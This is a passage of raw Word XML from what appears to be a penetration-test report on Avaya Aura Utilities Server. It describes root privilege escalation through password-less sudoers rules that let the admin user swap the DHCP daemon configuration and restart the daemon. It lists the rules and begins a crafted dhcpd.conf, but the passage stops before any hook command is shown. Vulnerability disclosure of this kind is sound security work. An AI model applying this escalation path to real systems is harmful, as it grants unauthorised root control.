      <w:r w:rsidR="009D3139">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00955ABE">
        <w:t xml:space="preserve">Root </w:t>
      </w:r>
      <w:r w:rsidR="009D3139">
        <w:t>Privilege Escalation via</w:t>
      </w:r>
      <w:r w:rsidR="00C679D8">
        <w:t xml:space="preserve"> Overly Permissive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C679D8">
        <w:t>Sudoer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C679D8">
        <w:t xml:space="preserve"> Configuration (</w:t>
      </w:r>
      <w:r w:rsidR="00955ABE">
        <w:t>DHCP Daemon Configuration Process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidR="00C679D8">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430235B0" w14:textId="00881A0D" w:rsidR="008007E1" w:rsidRDefault="008007E1" w:rsidP="00091BDF">
      <w:r w:rsidRPr="008007E1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CVSS 3.1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.0 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008007E1">
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008007E1">
        <w:t>/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C204B" w14:textId="405A29EE" w:rsidR="008007E1" w:rsidRPr="008007E1" w:rsidRDefault="008007E1" w:rsidP="00091BDF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008007E1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558AF0AA" w14:textId="22AB24F5" w:rsidR="008C3E48" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
      <w:r>
        <w:t>Please see related Issue: “</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref58926468 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t xml:space="preserve">7) Privilege Escalation via Overly Permissive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00011234">
        <w:t>Sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00011234">
        <w:t xml:space="preserve"> Configuration (vi)</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” first. </w:t>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C3E48">
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C3E48">
        <w:t xml:space="preserve"> discovered that password-less </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C3E48">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C3E48">
        <w:t xml:space="preserve"> rules exist for the admin user to manipulate the ISC BIND DHCPD daemon and its configuration. The DHCPD daemon runs as root, and these </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C3E48">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C3E48">
        <w:t xml:space="preserve"> rules can be abused to achieve code execution as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4C434B" w14:textId="77777777" w:rsidR="008C3E48" w:rsidRDefault="008C3E48" w:rsidP="00091BDF">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Technical Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A446914" w14:textId="24BE6B9D" w:rsidR="00091BDF" w:rsidRDefault="008C3E48" w:rsidP="00091BDF">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00091BDF">
        <w:t xml:space="preserve">he following admin password-less </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00091BDF">
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00091BDF">
        <w:t xml:space="preserve"> rules exist:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00091BDF" w14:paraId="1985B6EC" w14:textId="77777777" w:rsidTr="00091BDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4D3FDEC6" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sbin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">/service </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26522D45" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sbin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/service dhcp6s *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="399F73A7" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/cp </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcpd.conf.*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3524A15D" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/cp /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.lastgood</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="594F4280" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/cp /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.lastgood</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="50B720E9" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/cp </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf.*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C766084" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/cp /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.lastgood</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04616194" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/cp /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.lastgood /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E91208" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/mv /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="56657746" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/mv /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf.orig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0D9DA561" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 664 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="73DE31C2" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chown</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> root /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2E27D02C" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chgrp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>susers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4869E2A7" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/mv /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21290320" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/mv /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf.orig</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D69B007" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 664 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A92C85F" w14:textId="77777777" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chown</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> root /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B15E90" w14:textId="0C1DB776" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    (root) NOPASSWD: /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chgrp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>susers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/dhcp6s.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76F2DC53" w14:textId="6B7655D1" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">Taken together, the above rules allow </w:t>
      </w:r>
      <w:r w:rsidR="0000578A">
        <w:t>multiple ways for an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attacker with command line access as the admin user to edit and replace the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="002D36C9">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D36C9">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D36C9">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dhcp6s.conf files and then restart the corresponding ISC BIND daemons.  In the version of Avaya Aura Utilities Server that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was testing, there appears to be an issue where BIND is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>actually attempting</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to use files located under /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ instead of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/.  Therefore, it would be necessary for this issue to be corrected for the following attack to be viable</w:t>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:t>. H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">owever, since the DHCP </w:t>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> functionality appears to be one of the primary features of the Utilities Server admin section, it is not unreasonable to believe that this bug would either be fixed in other release</w:t>
      </w:r>
      <w:r w:rsidR="002D36C9">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or that a customer might alter the daemon to point to the correct location or create</w:t>
      </w:r>
      <w:r w:rsidR="005007F1">
        <w:t xml:space="preserve"> corresponding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> symbolic link</w:t>
      </w:r>
      <w:r w:rsidR="005007F1">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>, otherwise the admin functionality within the web application cannot be made to work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5E33E1" w14:textId="72E90293" w:rsidR="00091BDF" w:rsidRDefault="00091BDF" w:rsidP="00091BDF">
      <w:r>
        <w:t xml:space="preserve">Though the web application does not provide this functionality directly, an attacker with shell access as the </w:t>
      </w:r>
      <w:r w:rsidR="002D36C9">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin user can use the above commands to create a modified version of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/dhcp6s.conf that contain one </w:t>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:t>or more of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> following hooks which will grant code execution as root at various points during a DHCP lease </w:t>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:t>lifecycle</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="85" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9265"/>
      </w:tblGrid>
      <w:tr w:rsidR="00091BDF" w14:paraId="7190CCD0" w14:textId="77777777" w:rsidTr="00651FD7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9265" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="04BE4B46" w14:textId="77777777" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ddns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-update-style </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>interim;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="135A7168" w14:textId="77777777" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">update-static-leases </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>on;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0FBD665F" w14:textId="77777777" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">subnet 192.168.44.0 netmask 255.255.255.0 { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="700CF7D7" w14:textId="157EBFE2" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>authoritative;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3C8CEF30" w14:textId="6B435EEC" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    range 192.168.44.20 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>192.168.44.30;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
